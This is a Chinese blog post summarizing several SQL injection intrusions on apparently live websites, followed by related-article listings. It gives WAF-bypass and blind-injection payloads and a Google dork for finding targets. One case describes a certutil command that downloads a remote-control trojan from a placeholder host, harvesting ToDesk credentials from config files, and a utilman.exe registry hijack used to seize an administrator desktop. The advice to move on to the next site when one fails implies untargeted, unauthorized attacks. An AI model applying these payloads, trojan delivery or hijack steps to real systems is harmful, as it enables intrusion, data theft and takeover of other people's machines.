sql注入案例总结

已于 2024-01-29 15:56:00 修改
阅读量626 收藏 17
点赞数 9
文章标签: sql 数据库 服务器
于 2024-01-29 15:53:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/lyy8910599download/article/details/135909312
版权
本文详细描述了在ASP站点的Access数据库中进行SQL注入的检测、类型判断、poc测试方法,包括如何利用单引号、字符长度测试、构造轮子、绕过WAF以及最终获取数据库信息的过程。作者强调了合理使用工具、灵活变换策略的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、access注入.docx

1、信息收集

发现为asp站,access数据库

首先判断注入类型,判断完之后为数字型注入

2、测试poc

丢入poc:%20and%20exists%20(select%20*%20from%20表名)

3、用bp爆出表名

得到表名为news

2、sql注入报告.docx

1、用单引号多次试探返回字节长度

2、找到规律率后构建轮子

poc:   'or+1='1永恒之白

3、发现有waf后测试出过滤字符

尝试or、=、<>、!=、like、alike、regexp、xor、and、%0a、/**/、user()、database()、hostname、version

4、构建轮子尝试:

Poc: 1'or%0a'user'%0alike'b

Poc : 1'or%0a'()'%0alike'b

5、尝试成功后,用工具跑出表名,到此为止

3、绕过waf

1、单引号测试闭合发现sql语句

2、尝试联合注入,测试字段长度

Poc:1'union+select+1,2,...,n --+

3、多次尝试获得回显位置

4、SQL注入-盲注.pdf

1、单引号尝试注入点,发现返回字节长度规律

2、构造轮子尝试获取数据

3、如有waf想办法绕过

5、记一次SQL注入#2.pdf

1、发现注入点

2、单引号多次尝试,发现呈现周期性的变化

3、手工注入,构造 poc 轮子

4、多次尝试后获得poc

poc 'or+1/0=1+or'a'='a
5、用工具爆出库名,到此为止

6、记一次SQL注入#3.pdf

1 、挖掘注入点
谷歌语法: inurl: "?id="
2、在参数值后面加 /1 /0 判断注入类型(数值型、字符型)
3、 构造轮子
if(1,1,0) 可行,=,like,<>, !=, >=,<=,>,< ,rlike,ascii,mid出现永恒之白
多次尝试发现hex(), schema() ,left(),right()可行
4、获取 poc: 2/if(68.=hex(left(schema(),1)),1,0)
5、用工具跑出库名那个,到此为止

7、记一次渗透测试#H1某目标SQL注入.pdf

1、信息收集

2、发现可疑点果断下手

3、尝试无果后果断放弃,此家无缘换下一家

4、继续构建轮子,查看回显

Poc: 1'or%20if(1,sleep(3),1)='1
5、找到规律生成poc
Poc :1'or%20if((user()like'h%'),sleep(3),1)='1
6、工具跑出库名,到此为止

8、记一次由SQL注入引发的血案.pdf

1、懒人模式,上来直接工具扫出漏洞,system 权限的注入

2、可执行命令直接上上马(免杀马伺候)

windows 远程下载绕过命令就往它目录里下我的远控木马
命令:
certutil -url""""cache -split -f http://xxxx/1.exe
C:\ProgramData\1.exe
3、当止步不前时,多看看有啥可利用工具( todesk
todesk 这个软件可以静默安装(静默安装的命令
todesk.exe /S ),而且我
们和连接密码都在配置文件中,配置文件一般都是 C:\Program
Files\ToDesk\config.ini,咱可以利用 type 命令直接查看安装后的配置文件,
从而获取目标系统连接的账户的 id 和密码,从而登录目标系统的桌面
4、没有账号密码是,看看界面有啥可利用点(utilman)
utilman 是 Windows 辅助工具管理器程序也就是放大镜,粘滞键等等
而 windows 中 : tscon 命令常常用来 切换远程桌面的会话 ,我们如果能劫
utilman,将 utilman 替换成 cmd.exe,我们点击以后就可以弹出 cmd 的框,
这样我们使用 tscon 命令就可以切换到他管理员的桌面
5、注入劫持命令
命令: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d
"C:\windows\system32\cmd.exe" /f
6、劫持后想干啥就能干啥
点击我们的 utilman,可以看到成功弹出我们 cmd 框
可以看到 administrator 的 id 为 1
使用命令 tscon 1
7、成功切换到桌面后及时收手,非礼勿视

9、绕过正则SQL注入.pdf

1、寻找注入点

参数后面不断添加单引号,返回包中的 “ data ”数值呈规律性变化,判断此处存在 SQL 注入
2、构造基础 POC
多次尝试发现服务器waf正则匹配,于是乎采用注释加换行绕过
commonUserName=123'or--+777777777777%0a1='1
POC 变形: commonUserName=123'or-- +777777777777%0aUSER%0alike'A%
3、跑数据
爆出数据库名,及时收手

10、总结

1、利用工具,网站,等收集信息寻找注入点

2、找不到注入点果断换下一家,不要浪费时间(方向不对,努力白费)

3、构造轮子多次尝试绕WAF

4、生成POC

5、跑出库名

6、及时止步,远离犯罪

37-5 基于时间的盲注 SQL 注入 PoC 的 Python 编写
weixin_43263566的博客
04-24 306
通过这个脚本,我们可以理解到利用Python编写脚本可以自动化执行一些复杂的任务,比如在这个例子中,我们通过自动化的方式来利用时间盲注漏洞获取数据库名称。,通过逐渐增加数据库名称长度的方式,发送带有长度检测payload的HTTP请求,直到找到正确的长度为止。,利用多线程技术,同时测试每个位置上的数据库名称字符,直到获取完整的数据库名称为止。,通过发送包含特殊payload的HTTP请求来检查是否存在SQL注入点。,用于测试给定位置的数据库名称字符是否匹配。下,依次调用上述函数,完成整个过程。
sql注入测试用例
SHELLCODE_8BIT的博客
02-09 704
【代码】sql注入测试用例
渗透测试-SQL注入sqlmap的使用方法及实战案例
lza20001103的博客
07-19 4352
渗透测试-SQL注入sqlmap的使用方法及实战案例
Web安全和渗透测试--day6--sql注入--part 1
最新发布
qq_73704466的博客
04-17 1146
SQL 注入SQL Injection)是一种常见的网络安全攻击方式,攻击者通过在 Web 应用程序中输入恶意的 SQL 代码,绕过应用程序的安全机制,对数据库进行未授权的访问和操作。
安全测试之sql注入
jiayue的博客
05-14 9201
目录1. 概述1.1 web安全渗透测试分类web数据库安全(sql注入漏洞)web应用服务器安全(文件上传漏洞,文件包含漏洞)web客户端安全(XSS跨站攻击)1.2 sql注入原理1.3 sql注入危害1.4 sql注入实现方式手动实现sql注入工具自动实现sql注入2. 安全渗透环境搭建3. 实操3.1 预备知识操作数据库操作表基本语句-查询UNION语句特殊库sql注释sql注入流程3.2 手动注入环境准备查找注入点逻辑或应用案例字段数限制3.3 自动注入工具搭建环境sqlmap基本用法案例 1.
SQL各种注入详解加案例--持续更新
m0_72286569的博客
08-05 3165
sql执行的时候,floor是向下取整,配合rand(0)*2产生的前五位数字一定是01101,这下就简单了,我们来模拟group_by过程,遍历 表第一行时,先计算出一个 x=0security,查临时表,不存在,再次计算 x 然后插入 x=1security;id=1”,这里的?时间盲注和布尔盲注的区别是,不管输入的数据正不正确只显示一个跳转页面,当然在注入的时候可以加一个sleep函数使得页面进行沉睡,当访问正确的时候,页面沉睡几秒后跳转,访问错误页面即可跳转。1,当输入Less-1/?
SQL注入汇报PPT,sql注入,包括SQL注入简介、SQL注入攻击手段、如何防范SQL注入SQL注入案例分析、总结与展望
12-13
案例分析中,多个案例展示了不同环境下SQL注入攻击的实例和后果。例如,某电商网站因未验证用户输入和未使用参数化查询而受到攻击,导致用户账号密码等信息泄露;某论坛由于未转义输出和未验证输入,遭受了数据泄露...
SQL注入案例表格(超多案例
09-15
SQL注入案例表格中,每一行展示的是一个具体的案例,包含了注入的方式、注入点的位置、攻击者使用的技术等信息。对于学习SQL注入的朋友们来说,这些案例是十分宝贵的实战经验。通过案例学习,可以了解常见的SQL...
SQL 注入案例分析参考教程资料+pdf
12-12
本文将通过多个案例深入分析SQL注入的攻击原理、过程以及所带来的危害,并提供相应的防范措施。 首先,基于错误信息的SQL注入是攻击者利用数据库返回的错误信息来获取数据库结构信息的一种攻击方式。在用户登录的...
SQL注入简单总结——过滤逗号注入.pdf
04-08
"SQL注入简单总结——过滤逗号注入"的主题主要探讨了如何处理那些针对逗号(`,`)进行过滤的SQL注入情况。在SQL语句中,逗号常用于分隔不同的元素,例如在`UNION`、`LIMIT`等子句中。 1. **过滤逗号的绕过方法**: ...
SpringBoot集成Mybatis实现简单的SQL注入(攻击)案例
12-14
(1)主演示就是一张t_user表,利用常见的用户登录来模拟sql注入对后台数据的侵入 (2)数据库脚本 — postgresql DROP TABLE IF EXISTS "public"."t_user"; CREATE TABLE "public"."t_user" ( "id" int8 NOT ...
SQL注入用例及XSS用例
05-05
安全测试,SQL注入方面的用例及XSS的操作用例
sql注入
V_vevive的博客
08-05 1310
打开页面可以看到我们需要输入一个id,那么试着来传入id=1看看可以看到查出了登录密账号和密码,下面我们就开始进行SQL注入从上面两中方式都可以判断出数据库是有3列的然后我们需要知道页面所显示的name 和 password 属于数据库中的第几列从显示结果可以看到,这里的name是第2列,password是第3列。现在知道了数据库名称,然后就可以利用inforamtion_schema数据库拉查询出该数据库中所有的表和所有的列:?那么我们可以来尝试查询一下数据库的列数??
SQL注入测试
Trouvailless的博客
05-07 7233
0x01 等保测评项 GBT 22239-2019《信息安全技术 网络安全等级保护基本要求》中,8.1.4.4安全计算环境—入侵防范项中要求包括: a)应遵循最小安装的原则,仅安装需要的组件和应用程序; b)应关闭不需要的系统服务、默认共享和高危端口; c)应通过设定终端接入方式或网络地址范围对通过网络进行管理的管理终端进行限制; d)应提供数据有效性检验功能,保证通过人机接口输入或通过通信接口输入的内容符合系统设定要求; e)应能发现可能存在的已知漏洞,并在经过充分测试评估后,及时修补漏洞;
sql注入一般流程(附例题)
热门推荐
Battery的博客
08-03 14万+
在与服务器数据库进行数据交互的地方拼接了恶意的sql代码,达到欺骗服务器执行恶意代码的目的。本质上是程序把用户输入的数据当成了sql语句执行。
SQL注入基础原理与案例(详细总结)
剁椒鱼头没剁椒的博客
10-20 7437
本篇总结了学习SQL注入的笔记,暂时没总结WAF绕过方面的内容,后期会对WAF绕过进行总结。目前先总结一些基础的东西,可能有些参数不全,具体的参数或者函数可以百度搜索一下。发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。
XSS和sql注入部分场景测试用例样例
m0_37570494的博客
09-07 972
XSS 攻击通常是通过输入字段插入恶意的 JavaScript 代码,试图执行客户端脚本。设计这些测试用例时,需要涵盖常见的 XSS 攻击手段。SQL 注入攻击通常通过在输入字段中插入恶意 SQL 代码,试图操纵数据库查询。设计这些测试用例时,需要涵盖各种常见的 SQL 注入技术。
数据库测试】安全测试相关测试用例
u013177528的博客
04-24 754
在设计测试用例时,应始终遵循安全最佳实践,确保测试不会对生产环境造成损害。此外,测试人员应与开发团队紧密合作,确保所有发现的安全问题都能得到及时修复。
sql手工注入实战
mulincong的博客
05-30 2451
sql手工注入封神台靶场
java sql注入案例
06-13
Java SQL注入是一种常见的安全漏洞,攻击者可以通过构造恶意的SQL语句,获取或修改数据库中的数据。下面是一个简单的Java SQL注入案例: 假设有一个使用JDBC连接数据库的Java程序,其中一个查询用户信息的方法如下: ``` public User getUser(String username, String password) throws SQLException { String sql = "SELECT * FROM users WHERE username='" + username + "' AND password='" + password + "'"; Connection conn = DriverManager.getConnection(url, user, passwd); PreparedStatement pstmt = conn.prepareStatement(sql); ResultSet rs = pstmt.executeQuery(); if (rs.next()) { User user = new User(); user.setUsername(rs.getString("username")); user.setPassword(rs.getString("password")); user.setEmail(rs.getString("email")); return user; } else { return null; } } ``` 这个方法接收一个用户名和密码参数,从数据库中查询对应的用户信息。但是,如果攻击者将恶意的SQL语句传递给该方法,就可以造成SQL注入攻击。例如,如果攻击者将用户名参数设置为: ``` john' OR '1'='1 ``` 则构成的SQL语句为: ``` SELECT * FROM users WHERE username='john' OR '1'='1' AND password='xxxxx' ``` 这个SQL语句会返回所有用户的信息,因为'1'='1'永远为真。攻击者可以通过这种方式获取到所有用户的信息,甚至可以修改数据库中的数据。 为了防止SQL注入攻击,应该使用参数化查询,将用户输入的参数作为参数传递给SQL语句。修改上面的代码如下: ``` public User getUser(String username, String password) throws SQLException { String sql = "SELECT * FROM users WHERE username=? AND password=?"; Connection conn = DriverManager.getConnection(url, user, passwd); PreparedStatement pstmt = conn.prepareStatement(sql); pstmt.setString(1, username); pstmt.setString(2, password); ResultSet rs = pstmt.executeQuery(); if (rs.next()) { User user = new User(); user.setUsername(rs.getString("username")); user.setPassword(rs.getString("password")); user.setEmail(rs.getString("email")); return user; } else { return null; } } ``` 使用参数化查询后,即使攻击者传递恶意的用户名和密码,也不会造成SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值